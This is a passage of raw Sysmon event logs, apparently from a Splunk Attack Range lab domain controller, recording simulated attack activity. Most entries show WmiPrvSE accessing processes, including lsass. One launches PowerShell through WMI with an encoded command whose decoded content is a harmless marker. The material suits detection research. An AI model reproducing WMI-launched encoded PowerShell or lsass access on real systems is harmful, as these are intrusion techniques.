System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.840{05ADC7E1-6D64-603E-80AA-00000000AD01}5464ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_n1mrwcjp.gyu.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.840{05ADC7E1-6D64-603E-80AA-00000000AD01}5464ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u24x31rd.zfv.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.840{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-83AA-00000000AD01}14172C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002237501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.840{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC1F039E5125713F55E568ACE1AB7B98,SHA256=C37833D1DFE187AFB5B2F6916684A8F535852C97CF11CE5D3CE6F3013A487723,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.840{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.840{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.825{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.825{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.825{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.825{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.825{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.825{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002237492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.837{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -EncodedComm VwByAGkAdABlAC0ASABvAHMAdAAgAGQAYgBhADkAOABlAGEANAAtADYANwA2AGQALQA0AGQAZQA1AC0AOAAxAGUAOAAtADMAZgBjADQAMAAxAGUAYwBjADIAMwAwAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002237491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.825{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.825{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002237489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.825{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u24x31rd.zfv.ps12021-03-02 16:52:52.825 10341000x80000000000000002237488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.809{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-81AA-00000000AD01}11880C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.809{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.809{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7FAA-00000000AD01}10308C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.809{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.809{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7DAA-00000000AD01}14492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 